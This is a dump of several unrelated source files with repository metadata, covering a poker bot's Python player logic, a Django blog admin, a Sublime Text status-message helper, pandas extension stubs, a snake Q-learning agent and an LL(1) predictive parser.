maxRaise = int(value.split(':')[2])
elif 'BET' in value:
minBet = int(value.split(':')[1])
maxBet = int(value.split(':')[2])
elif 'CALL' in value:
callSize = int(value.split(':')[1])
elif 'CHECK' in value:
check = True
elif 'FOLD' in value:
fold = True
if minBet!=None and maxBet!=None:
actionsDict['bet']=True
actionsDict['betVals'] = list(range(minBet,maxBet+1))
if minRaise!=None and maxRaise!=None:
actionsDict['raiseVals'] = list(range(minRaise,maxRaise+1))
actionsDict['raise'] = True
if callSize!=None:
actionsDict['callVals'] = callSize
actionsDict['call'] = True
if check:
actionsDict['check'] = True
if fold:
actionsDict['fold'] = True
return actionsDict
@classmethod
def botResponse(self, logicTuple = ('check',0)): #formats output of botLogic
possibleActions = ['check','fold','bet','raise','call']
responseType = logicTuple[0]
quantity = logicTuple[1]
assert(responseType in possibleActions)
if responseType=='check' or responseType=='fold':
response = str.encode(responseType.upper()+'\n')
else:
response = str.encode(responseType.upper()+':'+str(quantity)+'\n')
return response
#manage opponent data
def oppUpdate(self):
#self.opponents initialized in run()
for opponent in self.opponents:
currOpp = self.opponents[opponent]
if currOpp.name!=self.name:
currOpp.statUpdate()
varsOppCopy = copy.deepcopy(vars(currOpp))
varsOppCopy.pop('histories')
#print(currOpp.name, '\n', varsOppCopy,'\n\n')
#top level function for computing all stats
def statUpdate(self):
self.getAggressionFactor()
self.getExpectedValue()
self.getWinRate()
self.getImpliedPotOdds()
try:
self.stack = int(self.stackSizes[self.playerNames.index(self.name)])
except:
pass
self.blindsLeft = int(self.stack/self.blind)
#stat/history computation functions (must work for opponents with only histories as input)
#implied pot odds
def getImpliedPotOdds(self):
impliedPot = self.potSize
for action in self.actions:
if "CALL" in action:
callSize = int(action.split(':')[1])
elif "RAISE" in action or "BET" in action:
minRaise = int(action.split(':')[1])
maxRaise = int(action.split(':')[2])+minRaise #if we raise
enumRaises = list(range(minRaise,maxRaise+1))
try:
#enumRaises = [0]+[callSize]+enumRaises fold,call,raise
#we shift 0->callSize-1 because statistics
enumRaises = [callSize-1]+[callSize]+enumRaises
except:
pass
try:
if len(enumRaises)>1: #not just callSize-1
expectedActions = dict()
for opponent in self.opponents:
currOpp = self.opponents[opponent]
randomAction = 0
samples = 1000
for i in range(samples):
#scale chosen by inspection
randomAction +=int(abs(logistic(currOpp.AF*maxRaise,1)))
randomAction /= samples
expectedActions[currOpp.name] = Player.closestInt(enumRaises,randomAction)
for oppAction in expectedActions:
if expectedActions[oppAction]==callSize-1:
continue
else:
impliedPot+=expectedActions[oppAction]
self.impliedPotOdds = callSize/impliedPot
else:
pass
except:
#no CALL or RAISE in histories
pass
@staticmethod
def closestInt(L,num):
minDiff = currDiff = None
minElem = None
for i in range(len(L)):
currDiff = abs(L[i]-num)
if minDiff == None: minDiff=currDiff
if currDiff<=minDiff: #break ties downwards
minDiff = currDiff
minElem = L[i]
return minElem
def getWinRate(self):
wins = 0
for event in self.histories[self.name]:
if ("WIN" in event or 'TIE' in event) and self.name in event:
wins+=1
self.winRate = wins/self.numHands
def getExpectedValue(self):
if len(self.hole+self.board)<=6:
outProb = Player.monteCarloTest(self.hole+self.board, True)
self.EV = outProb-self.potOdds
self.impliedEV = outProb-self.impliedPotOdds
def boardReset(self):
self.allHistories.append((['back']*5,time.time()))
def historyUpdate(self, packetValues, handOver=False):
if not handOver:
for value in packetValues:
if value.count(':')==2: #raise,bets,calls have 2 colons
for player in self.playerNames:
if player in value:
self.histories[player].append(value)
elif handOver:
river = []
for value in packetValues:
#only needs to compute winrate for self
if ('WIN' in value or 'TIE' in value) and self.name in value:
self.histories[self.name].append(value)
elif len(value)==2:
if value[0] in Player.values and value[1] in Player.suits:
river.append(value)
self.allHistories.append((river,time.time()))
#repeats in board, potsize, and playerinfo are fine
self.allHistories.append((self.board,time.time()))
self.allHistories.append((['pot',self.potSize],time.time()))
#print('historyUpdate check', self.name, self.hole)
self.allHistories.append(([self.name,self.hole,self.stack],time.time()))
if self.name=='player1':
for value in packetValues:
if ':' in value and 'player' in value:
self.allHistories.append((value,time.time())) #dont want repeats in events
print(self.allHistories,'\n\n')
'''
AF benchmark values:
http://poker.gamblefaces.com/understanding-hud/post-flop-aggression-factor/
AF Value Category
0<AF<1 Passive
1<AF<1.5 Neutral
AF>1.5 Aggressive
'''
def getAggressionFactor(self):
#set both to 1 b/c divide by zero
downs = 1 #calls or folds
ups = 1 #bets or raises
for event in self.histories[self.name]:
if 'CALL' in event: #or 'FOLD' in event:
downs+=1
elif 'BET' in event or 'RAISE' in event:
ups+=1
self.AF = ups/downs
if self.AF<1:
self.AFtype = 'passive'
elif self.AF>=1 and self.AF<1.5:
self.AFtype = 'neutral'
elif self.AF>=1.5:
self.AFtype = 'aggressive'
#class/static methods
@staticmethod
def readFile(path, withPickle = False):
if withPickle:
with open(path, "rb") as f:
return pickle.load(f)
else:
with open(path, "rt") as f:
return f.read()
@staticmethod
def writeFile(path, contents, withPickle = False):
if withPickle:
with open(path, "wb") as f:
pickle.dump(contents,f)
else:
with open(path, "wt") as f:
f.write(contents)
#get blind size from config.txt
@classmethod
def getBlind(self):
path = os.getcwd()
config = Player.readFile(path+os.sep+'config.txt')
return int(config.split('\n')[0][-1])
@classmethod
def bestHand(Player,cards):
#call this function post-flop and on turn to compute best hand
#get unordered 5-tuples from allCards
hands = list(it.combinations(cards,5)) #list of tuples
best = 0 #power of best hand
for hand in hands:
result = Player.checkHandType(hand)
if result[1]>=best:
best=result[1]
return best
@classmethod
def monteCarloTest(Player,allCards,returnProb = False):
#runs Monte Carlo sim to get average best hand if cards are added
#to community
simNum = 100
simCount = 0
cumePower = 0
adjustedFullDeck = copy.copy(Player.fullDeck)
assert(len(allCards)<=6)
if returnProb:
beatCount = 0
currBest = Player.bestHand(allCards)
#removing hole cards
for card in adjustedFullDeck:
if card in allCards:
adjustedFullDeck.remove(card)
initAdjustedFullDeck = copy.copy(adjustedFullDeck)
while simCount<=simNum:
adjustedFullDeck = copy.copy(initAdjustedFullDeck)
currCards = copy.copy(allCards)
if len(allCards)<=6: #river
nextCard = random.choice(adjustedFullDeck)
currCards+=[nextCard]
adjustedFullDeck.remove(nextCard)
if len(allCards)<=5: #turn
nextCard2 = random.choice(adjustedFullDeck)
currCards+=[nextCard2]
adjustedFullDeck.remove(nextCard2)
if len(allCards)==2: #flop
nextCard3 = random.choice(adjustedFullDeck)
currCards+=[nextCard3]
if Player.bestHand(currCards)>currBest:
beatCount+=1
cumePower+=Player.bestHand(currCards)
simCount+=1
if returnProb:
return beatCount/simNum #probabilty of getting a better hand than currBest
else:
return cumePower/simNum
@classmethod
def powerRatio(Player,allCards):
currBest = Player.bestHand(allCards)
predictedBest = Player.monteCarloTest(allCards)
#my own definition of pot odds
return predictedBest/currBest
@classmethod
def checkHandType(Player,hand):
#returns hand type, as well as power index
def highFreq(handStr):
uniques = list(set(handStr))
maxFreq = 0
for i in uniques:
if handStr.count(i)>maxFreq:
maxFreq=handStr.count(i)
return maxFreq
def twoPair(hand,handStrVals):
valList = list(set(handStrVals))
counts = []
for i in counts:
counts+=handStrVals.count(i)
if sorted(counts)==[1,2,2]:
return True
assert(len(hand)==5) #texas hold'em hands have 5 cards
handStr = ''.join(hand)
handStrVals = ''.join(sorted([x[:-1] for x in hand])) #just values
handStrSuits = ''.join([x[-1] for x in hand]) #just suits
#royal flush
if handStrVals in Player.valuesStr and len(set(handStrSuits))==1:
handType = 'straightflush' #royal flush is just straight flush with maxPower
elif highFreq(handStrVals)==4:
handType = '4ofakind'
elif len(set(handStrVals))==2:
handType = 'fullhouse'
elif len(set(handStrSuits))==1:
handType = 'flush' #doesn't conflict with straight flush b/c elif
elif handStrVals in Player.valuesStr:
handType = 'straight'
elif highFreq(handStrVals)==3:
handType = '3ofakind'
elif twoPair(hand,handStrVals):
handType = '2pair'
elif highFreq(handStrVals)==2:
handType = '1pair'
else:
handType = 'highcard'
#particular power within hand family
return (handType, Player.handOrder.index(handType)+1)
#Player will have a list of Opponent instances
class Opponent(Player):
def __init__(self, name, playerDict):
super().__init__(name)
self.histories = playerDict['histories'][self.name]
#update attributes on each packet
def attrsUpdate(self,playerDict):
self.histories = {self.name: playerDict['histories'][self.name]}
self.numHands = playerDict['numHands']
| [
"aptebros@gmail.com"
] | aptebros@gmail.com |
8221254cccecc142e5a2d0560a81568baf3ee901 | 0c3dc0735791266e2127859a38ae20ed8040c08e | /control_horas_lectivas/dtos/usuario_dto.py | ab5937d06c2060e507bf92e4ae8b019ce9511055 | [] | no_license | williamccondori/unsa_sistema_academico | 4ac0d5400d953daea44f4be78fc3210b1e07e023 | 9046dd70dc729b90f4c83a7e799007f459f51aca | refs/heads/master | 2021-03-30T23:48:08.858797 | 2018-04-05T22:15:29 | 2018-04-05T22:15:29 | 125,013,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | class UsuarioDto(object):
def __init__(self, username='', id_departamento=0):
self.Username=username
self.IdDepartamento = id_departamento | [
"williamccondori@outlook.com"
] | williamccondori@outlook.com |
e5efc3c9464fe665edf8cf81776c48e663dc9fed | a4fc49a7d188f0d56e93207fba79db00406e2783 | /instance/config.py | a23b87080b763b7f4af8e2baf31c53c2cd37f17d | [] | no_license | wightcotton/Budgeting | 411aca92af7f6106762553f8868ce22d4911cd9b | 05acc40a211ca365bfb786b4de5c40403e2031e6 | refs/heads/master | 2021-01-06T02:56:08.489026 | 2019-07-10T21:09:09 | 2019-07-10T21:09:09 | 241,205,671 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | # configs
DATASOURCE = "C:/Users/Bob/Documents/money/budget/current budget info.xlsx" | [
"bob@wightcottonn.com"
] | bob@wightcottonn.com |
713716f99e0b6a39fd9ebd2069050e1a8522be74 | b2e501080c178839d8fa4146b0392da8470bf677 | /QAgent.py | daf8d540c9f976bff46e0a1c23ed2d35f43a81f1 | [] | no_license | nsms556/AILearningsSnake | 5c66b810476cf5309add9f8c34e9426b423c7735 | e054f81d7fd191821acc1025643ce3704467ba34 | refs/heads/master | 2023-03-26T05:37:18.197810 | 2021-03-24T12:35:16 | 2021-03-24T12:35:16 | 325,515,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,787 | py | import random
from collections import deque
from typing import final
import numpy as np
import torch
from snake import SnakeGame
from utils.Snake_Statics import HIDDEN_SIZE, INPUT_SIZE, OUTPUT_SIZE,
import utils.AIUtils as AIU
from models.torchModel import *
MAX_MEMORY = 100000
BATCH_SIZE = 1000
LR = 0.001
class QAgent :
def __init__(self) :
self.n = 0
self.epsilon = 0
self.gamma = 0.9
self.memory = deque(maxlen=MAX_MEMORY)
self.model = QNet(INPUT_SIZE, HIDDEN_SIZE, OUTPUT_SIZE)
self.trainer = QTrainer(self.model, lr=LR, gamma=self.gamma)
def get_state(self, game) :
return AIU.get_inputs(INPUT_SIZE, game)
def remember(self, state, action, reward, next_state, done) :
self.memory.append((state, action, reward, next_state, done))
def train_long_memory(self) :
if len(self.memory) > BATCH_SIZE :
mini_Sample = random.sample(self.memory, BATCH_SIZE)
else :
mini_Sample = self.memory
states, actions, rewards, next_states, dones = zip(*mini_Sample)
self.trainer.train_step(states, actions, rewards, next_states, dones)
def train_short_memory(self, state, action, reward, next_state, done) :
self.trainer.train_step(state, action, reward, next_state, done)
def get_action(self, state) :
self.epsilon = 80 - self.n
final_action = [0, 0, 0, 0]
if random.randint(0,200) < self.epsilon :
move = random.randint(0,3)
final_action[move] = 1
else :
state0 = torch.tensor(state, dtype=torch.float)
pred = self.model(state0)
move = torch.argmax(pred).item()
final_action[move] = 1
return final_action
def train() :
| [
"nsms556@kakao.com"
] | nsms556@kakao.com |
771ec8576328d1d3ae8a24f14afee76c8db1f54a | 3ba1c1bd3215634f0422bbbba1ac6871c3592d1c | /process/aon1e.py | fef5d0530df67763c6e4ebca3d95a36e451700cf | [] | no_license | Djphoenix719/nlp2020-project | d928a81fcf45be5671a7f6b5eb011ec2e91c64fe | c7b54dec8b941c0a9e92b73285485b07e07e283f | refs/heads/main | 2023-01-23T03:11:08.869025 | 2020-12-13T23:38:33 | 2020-12-13T23:38:33 | 310,170,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,361 | py | import os
from bs4 import BeautifulSoup
from tqdm import tqdm
from process.util import ladle, collect_until_end, full_clean, write_output
def process_aon1e():
system = 'pf1e'
input_dir = f"data/raw/{system}"
os.makedirs(f'data/processed/{system}', exist_ok=True)
for file_name in tqdm(os.listdir(input_dir), desc=f'Processing {system}', unit='file', position=0, leave=True):
file_path = os.path.join(input_dir, file_name)
soup, raw_text = ladle(file_path)
soup = BeautifulSoup(str(soup.find('div', {'class': 'main'})), features='html.parser')
title = soup.find('h1', {'class': 'title'})
monster_name = title.text
lore_start = title.find_next('h3', {'class': 'framing'}, text='Description')
if lore_start is None:
continue
lines = collect_until_end(lore_start.next_sibling, end_on_tags=['h1'], skip_collection=['b'])
short_desc = title.find_next('i').text
if "pg." not in short_desc.lower():
lines = [short_desc, *lines]
lines = full_clean(lines)
# lines = "".join(lines)
# lines = lines.replace('\n', ' ')
# lines = lines.split('.')
# lines = [f"{line}.".strip() for line in lines if line.strip() != ""]
# lines = "\n".join(lines)
write_output(monster_name, system, lines)
| [
"andrewcuccinello@gmail.com"
] | andrewcuccinello@gmail.com |
bd13eec195727b03591f3658eaa75c0f54f16624 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03827/s915868982.py | 561cb7cb4a15cc5878feaba7bc58f0a5af14916d | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | N = int(input())
S = input()
x = 0
ans = 0
for s in S:
x += 1 if s == "I" else -1
ans = max(ans, x)
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f12934c72c25fe75ab9552dceeb66260eb6849a0 | 484377c159df3241f9a53e5e03f754563d0630cb | /blog/admin.py | f5f330e8de99c6e1fe5391779c9f34d1482f5287 | [] | no_license | SandyOliveira/BlogEmDjango | 43ed851418a7f2c1edb6da71524938aaa5fa8d32 | 6b8a87cf82f73ac2541f37b547efb3d9c37debc0 | refs/heads/master | 2022-10-17T06:10:40.935679 | 2020-06-09T00:51:43 | 2020-06-09T00:51:43 | 266,949,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,072 | py | from django.contrib import admin
from .models import Post, Category
@admin.register(Category)
class PostAdmin(admin.ModelAdmin):
    # Admin options for Category: list columns, sidebar filters,
    # date drill-down on 'publicado' and search on the name field.
    # NOTE(review): this class shares its name with the Post admin defined
    # below; the later definition shadows this one at module level (the
    # registration above still works) -- consider renaming to CategoryAdmin.
    list_display =('nome','criado','publicado')
    list_filter = ('nome','criado','publicado')
    date_hierarchy = 'publicado'
    search_fields = ('nome',)
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
    """Admin configuration for Post entries."""
    list_display = ('title', 'autor', 'publicado','status')
    list_filter = ('status', 'criado', 'publicado', 'autor') # sidebar filters
    readonly_fields = ('view_image',) # show the stored image to the admin
    raw_id_fields = ('autor',) # raw-id widget for FK/M2M fields (pick by ID)
    date_hierarchy = 'publicado' # date drill-down navigation (by publish date)
    search_fields = ('title', 'conteudo') # fields covered by the search box
    # BUG FIX: the Django option is `prepopulated_fields` (plural); the
    # misspelled `prepopulated_field` was silently ignored, so the slug
    # was never auto-filled from the title in the admin form.
    prepopulated_fields = {'slug': ('title',)} # auto-fill slug from title
    # Exposes view_image under a friendlier column label.
    def visualizar_imagem(self,obj):
        return obj.view_image
    visualizar_imagem.short_description = "Imagem Cadastrada"
"sandyoliveira828@gmail.com"
] | sandyoliveira828@gmail.com |
fd955388fa01f31415dd266a61d5fc2462658529 | b8072195ed98dba9873cda7f12e28399e0a8c006 | /ShazamBot/Shazam-Samil/bot/__init__.py | 6031088460dd7e78f5b4e0c824be83c62be3c485 | [
"Apache-2.0"
] | permissive | Yuziful/shazambot | a39bb123278c0b537ce0c8e77cd8e5c04e7e852c | 2d645ec80aa4cce8d4b5ec8c3505975d25c8bed2 | refs/heads/main | 2023-07-27T00:10:12.731407 | 2021-09-09T16:11:06 | 2021-09-09T16:11:06 | 404,788,514 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | import logging
from configparser import ConfigParser
from bot.bot import bot
# Logging at the start to catch everything
logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    level=logging.WARNING,
    handlers=[
        logging.StreamHandler()
    ]
)
LOGS = logging.getLogger(__name__)
name = 'bot'
# Read from config file -- expects "bot.ini" in the working directory;
# a missing file is silently tolerated by ConfigParser.read().
config_file = f"{name}.ini"
config = ConfigParser()
config.read(config_file)
# Presumably a file-size cap in bytes -- TODO confirm where it is enforced.
max_file = 30641629
# Extra details
__version__ = '0.0.1'
__author__ = 'pokurt'
# Global Variables
# NOTE(review): this rebinds the imported name `bot` to the constructed
# instance, shadowing the class imported at the top of the module.
bot = bot(name)
| [
"noreply@github.com"
] | noreply@github.com |
059d13000f25ac9b116e3ab42c1393e2fb8619a7 | 7bb46e67befa4941bb729846abfd04007a98cb2b | /colorsublime/status.py | 3c31e2bdfbc90b00e64dee28b947644538afcacc | [
"MIT"
] | permissive | Colorsublime/Colorsublime-Plugin | 8916b83c5bc650860f7ac4ed11b3aa515509a287 | 9d9c07c0807b912a5d97776a4373aba4dabe7b7f | refs/heads/master | 2022-12-21T21:24:08.846490 | 2022-12-20T03:41:39 | 2022-12-20T03:41:39 | 17,201,705 | 515 | 82 | null | 2017-08-25T10:10:31 | 2014-02-26T06:45:18 | Python | UTF-8 | Python | false | false | 2,477 | py | # -*- coding: utf-8 -*-
"""
Module to set the view status of Sublime Text plugins.
By @blopker
"""
import random
import time
import sublime
from .lib.concurrent import futures
from . import logger
from . import settings
log = logger.get(__name__)
statusPool = futures.ThreadPoolExecutor(max_workers=1)
PLUGIN_NAME = settings.plugin_name
# Default status display time in seconds
TIMEOUT = 10
current_message = None
def message(msg, seconds=TIMEOUT):
    """Display *msg* in the status bar for *seconds* seconds.

    Only one plugin message is active at a time: any message currently
    showing is stopped first.  Returns the new Message object; call
    .stop() on it to remove the message early.
    """
    log.info(msg)
    global current_message
    # Cancel the previous message before starting a new one.
    if current_message is not None:
        current_message.stop()
    current_message = Message(msg, seconds)
    return current_message
def error(msg, seconds=TIMEOUT):
    """Log *msg* as an error and show it in the status bar.

    The displayed text is prefixed with 'ERROR: ' so it stands out.
    BUG FIX: `seconds` was previously accepted but never forwarded to
    message(), so callers could not control how long an error stayed
    visible; it is now passed through.
    """
    log.error(msg)
    return message('ERROR: ' + msg, seconds)
def loading(msg, seconds=TIMEOUT):
    """Show an animated loading indicator for *msg*.

    The display time is doubled relative to *seconds* because loading
    operations can take a while.
    """
    return Loader(msg, 2 * seconds)
class Message(object):
    """ Class to start and cancel the status message.
    Call stop() on this object to remove the message.

    The message is refreshed on a background thread (via the module's
    single-worker statusPool) until stop() is called or the timeout
    elapses.
    """
    def __init__(self, message, timeout):
        self.message = message
        self.running = True            # polled by the background loop
        self.timeout = timeout         # seconds before auto-dismissal
        self.start_time = time.time()
        self.msg_id = self._get_id(message)
        # Kick off the display loop on the shared worker thread.
        statusPool.submit(self._show_message)
    def _get_current_view(self):
        # The view that was active when the loop started.
        window = sublime.active_window()
        view = window.active_view()
        return view
    def _append_plugin_name(self, msg):
        return '%s: %s' % (PLUGIN_NAME, msg)
    def _get_id(self, msg):
        # Unique status key so concurrent messages do not clobber each other.
        return msg + str(time.time())
    def _update_timer(self):
        # Auto-stop once the configured timeout has elapsed.
        elapsed = time.time() - self.start_time
        if elapsed > self.timeout:
            self.stop()
    def _show_message(self):
        # Background loop: rewrite the status line ~10x/second so that
        # subclasses (e.g. Loader) can animate, then clear it on exit.
        view = self._get_current_view()
        while self.running:
            msg = self._get_message()
            stat = self._append_plugin_name(msg)
            view.set_status(self.msg_id, stat)
            time.sleep(.1)
            self._update_timer()
        view.erase_status(self.msg_id)
    def _get_message(self):
        # Hook point for subclasses; the base class shows static text.
        return self.message
    def stop(self):
        self.running = False
class Loader(Message):
    """Animated variant of Message: appends a randomly chosen Braille
    spinner glyph on every refresh to suggest activity."""
    chars = u'⣾⣽⣻⢿⡿⣟⣯⣷'
    def _get_message(self):
        # Pick one random glyph per refresh tick (random.sample of size 1).
        mod = len(self.chars)
        rands = [self.chars[x % mod] for x in random.sample(range(100), 1)]
        msg = self.message + ' [' + ''.join(rands) + '] '
        return msg
    def stop(self):
        # NOTE(review): identical to Message.stop(); kept for clarity only.
        self.running = False
| [
"lopkerk@gmail.com"
] | lopkerk@gmail.com |
03fa8f0ea7916556b812e4b74da0e4cb6a8bd37d | 41dbe386398222d83eb392528dc738d30c31ecf1 | /src/translate.py | 14afee1e38380ac2cf778fead91a944c28f659d8 | [] | no_license | spidgorny/learn-english-by-youtube | dc00fe6f6948bd7416faf4ea84badf9e20d1706a | d7ea46035cadf95ef3a66e8b965b8503088f4267 | refs/heads/master | 2023-01-07T01:23:16.318036 | 2022-02-21T09:56:53 | 2022-02-21T09:56:53 | 188,993,746 | 1 | 0 | null | 2023-01-05T23:58:02 | 2019-05-28T09:06:30 | HTML | UTF-8 | Python | false | false | 591 | py | # -*- coding: utf-8 -*-
# Imports the Google Cloud client library
from google.cloud import translate
from dotenv import load_dotenv
load_dotenv()  # load GOOGLE_APPLICATION_CREDENTIALS etc. from a .env file
# import sys
# import codecs
# sys.stdout = codecs.getwriter('utf8')(sys.stdout)
# Instantiates a client
translate_client = translate.Client()
# The text to translate
text = u'Hello, world!'
# The target language
target = 'ru'
# Translates some text into Russian
translation = translate_client.translate(
    text,
    target_language=target)
# The API returns a dict; 'translatedText' holds the translated string.
print(u'Text: {}'.format(text))
print(u'Translation: {}'.format(translation['translatedText']))
| [
"spidgorny@gmail.com"
] | spidgorny@gmail.com |
fc521136d37bde83bf4b77d4966c06e6653d750b | 3f6c16ea158a8fb4318b8f069156f1c8d5cff576 | /.PyCharm2019.1/system/python_stubs/-1317042838/pandas/_libs/ops.py | a84d13f1d42b972f9af8b614b27048d38673cdb9 | [] | no_license | sarthak-patidar/dotfiles | 08494170d2c0fedc0bbe719cc7c60263ce6fd095 | b62cd46f3491fd3f50c704f0255730af682d1f80 | refs/heads/master | 2020-06-28T23:42:17.236273 | 2019-10-01T13:56:27 | 2019-10-01T13:56:27 | 200,369,900 | 0 | 0 | null | 2019-08-03T12:56:33 | 2019-08-03T11:53:29 | Shell | UTF-8 | Python | false | false | 2,829 | py | # encoding: utf-8
# module pandas._libs.ops
# from /var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/pandas/_libs/ops.cpython-36m-x86_64-linux-gnu.so
# by generator 1.147
# no doc
# imports
import builtins as __builtins__ # <module 'builtins' (built-in)>
import operator as operator # /usr/lib/python3.6/operator.py
import numpy as np # /var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/numpy/__init__.py
# functions
# NOTE: auto-generated IDE stubs for the compiled extension
# pandas._libs.ops; the `pass` bodies are placeholders -- the real
# implementations live in the .so referenced above.  Do not edit by hand.
def maybe_convert_bool(*args, **kwargs): # real signature unknown
    # Stub; no documentation was extracted for this function.
    pass
def scalar_binop(*args, **kwargs): # real signature unknown
    """
    Apply the given binary operator `op` between each element of the array
    `values` and the scalar `val`.
    Parameters
    ----------
    values : ndarray[object]
    val : object
    op : binary operator
    Returns
    -------
    result : ndarray[object]
    """
    pass
def scalar_compare(*args, **kwargs): # real signature unknown
    """
    Compare each element of `values` array with the scalar `val`, with
    the comparison operation described by `op`.
    Parameters
    ----------
    values : ndarray[object]
    val : object
    op : {operator.eq, operator.ne,
          operator.le, operator.lt,
          operator.ge, operator.gt}
    Returns
    -------
    result : ndarray[bool]
    """
    pass
def vec_binop(*args, **kwargs): # real signature unknown
    """
    Apply the given binary operator `op` pointwise to the elements of
    arrays `left` and `right`.
    Parameters
    ----------
    left : ndarray[object]
    right : ndarray[object]
    op : binary operator
    Returns
    -------
    result : ndarray[object]
    """
    pass
def vec_compare(*args, **kwargs): # real signature unknown
    """
    Compare the elements of `left` with the elements of `right` pointwise,
    with the comparison operation described by `op`.
    Parameters
    ----------
    left : ndarray[object]
    right : ndarray[object]
    op : {operator.eq, operator.ne,
          operator.le, operator.lt,
          operator.ge, operator.gt}
    Returns
    -------
    result : ndarray[bool]
    """
    pass
def __pyx_unpickle_Enum(*args, **kwargs): # real signature unknown
    # Cython-internal unpickling helper; stub only.
    pass
# no classes
# variables with complex values
__loader__ = None # (!) real value is '<_frozen_importlib_external.ExtensionFileLoader object at 0x7f43e7e6f8d0>'
__spec__ = None # (!) real value is "ModuleSpec(name='pandas._libs.ops', loader=<_frozen_importlib_external.ExtensionFileLoader object at 0x7f43e7e6f8d0>, origin='/var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/pandas/_libs/ops.cpython-36m-x86_64-linux-gnu.so')"
__test__ = {}
| [
"sarthakpatidar15@gmail.com"
] | sarthakpatidar15@gmail.com |
51764b3f701d9df92c6b024d368596af088cbcc0 | 2f8e7319ddc96c9447b8977e9b5029bb7a342996 | /compilertesttttt.py | 17b853a120db6a9ed055d665c1bfafd3016d4e98 | [] | no_license | zpicenow/squirrel_buggy | 78bc8112c79ec145e6fbf15685167e37e456da5a | b94595976fc7aba6e28c2398f9096a6e3c83bf2f | refs/heads/master | 2020-04-01T20:04:40.367733 | 2018-10-18T08:09:07 | 2018-10-18T08:09:07 | 153,587,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,160 | py | import copy
# Table-driven predictive (LL(1)) analysis of input sequence w using
# prediction table M, nonterminal set N and terminal set T.
def prediction_analyze(w, M, N, T):
    """Run a predictive parse of the token sequence `w`.

    Prints one table row per step (stack contents, remaining input,
    action, description).  Returns False on a parse error; falls through
    (returns None) on a successful parse.  Conventions: N[0] is the start
    symbol, '#' is the end-of-input marker, and a table entry of ['n']
    denotes the empty production (nothing is pushed).
    """
    mat = "步骤{:<15}\t栈内容 {:<20}\t当前输入 {:<30}\t动作{:<30}\t描述 {:<20}"
    print(mat.format(" ", " ", " ", " ", " ", ))
    Stack = list()  # the parser's symbol stack
    Stack.append('#')  # push the end-of-input marker
    Stack.append(N[0])  # push the start symbol (first nonterminal of N)
    top = len(Stack) - 1  # index of the stack top (last element)
    ip = 0  # index of the current terminal within the input sequence w
    step = 1  # step counter (for the printed trace)
    # Loop while the stack is non-empty.
    while Stack:
        content = ''.join(Stack)  # stack contents as a string, for display
        inputchar = ''.join(w[ip:])
        action = ""
        des = ""
        a = w[ip]  # current input symbol
        x = Stack[top]  # symbol on top of the stack
        if x in T:  # top of stack is a terminal: try to match it
            if x == a:  # terminal matches the current input symbol
                if Stack[-1] == '#' and a == '#':
                    # Both stack and input reached the end marker: accept.
                    mat = "{:<20}\t {:<25}\t {:<30}\t {:<40}\t{:<20}"
                    print(mat.format(step, content, inputchar, " ", "正确结束"))
                    break
                action = "pop(" + x + "), next(ip)"
                des = "匹配" + x
                Stack.pop()  # pop the matched terminal
                top -= 1
                ip += 1  # advance to the next input symbol
            else:
                print("出错!栈顶终结符不匹配。")
                return False
        else:  # top of stack is a nonterminal: expand it via the table
            xIndex = N.index(x)  # row of x in the prediction table
            if a in M[xIndex]:  # the table entry M[x, a] exists
                result = copy.deepcopy(M[xIndex][a])  # production RHS (a list)
                action = "pop(" + x + "), push(" + ''.join(result) + ")"
                des = "按" + x + "->" + ''.join(result) + "展开"
                Stack.pop()  # pop the expanded nonterminal
                top -= 1
                if result[0] == 'n':  # 'n' = empty production: push nothing
                    action = "pop(" + x + ") "
                else:
                    # Push the production right-hand side in reverse order.
                    result.reverse()
                    for j in range(0, len(result)):
                        Stack.append(result[j])
                        top += 1
            else:
                print("出错!产生式不匹配。")
                return False
        # Report this step of the parse.
        mat = "{:<20}\t {:<25}\t {:<30}\t {:<30}\t{:<20}"
        print(mat.format(step, content, inputchar, action, des))
        step += 1  # next step; continue the loop
if __name__ == '__main__':
    # Interactive driver: collects the grammar (N, T, M) and an input
    # sequence from the user, then runs one predictive parse.
    # SECURITY NOTE(review): eval(input(...)) executes arbitrary Python;
    # acceptable for a classroom demo only -- consider ast.literal_eval.
    print("---------即将开始收集数据,请按提示操作---------' ")
    print("请输入文法G的非终结符的集合N , 输入格式为List , 如['L' , 'E' , 'rE' , 'T' , 'rT' , 'F'] ")
    N = eval(input(":"))
    print("请输入文法G的终结符的集合T , 输入格式为List , 如['id' , 'num' , '+' , '-' , '* ', '/ ', 'mod' , '(' , ')' , '; ', '#'] ")
    T = eval(input(":"))
    print("请输入文法G的预测表M , 输入格式如{'id' : ['id'] , 'num' : ['num'] , '(' : ['(', 'E' , ')'] } ] ")
    M = eval(input(":"))
    # (The original kept large commented-out sample values for N / T / M and
    # an example sequence w here; condensed into this note for readability.)
    while True:
        w = eval(input('请输入要分析的序列w(以#号结束):'))
        print(
            "----------------------------------------------------分析过程----------------------------------------------------")
        prediction_analyze(w, M, N, T)  # run the predictive analysis
        print(
            "----------------------------------------------------分析结束----------------------------------------------------")
        break
| [
"zp2016@mail.dlut.edu.cn"
] | zp2016@mail.dlut.edu.cn |
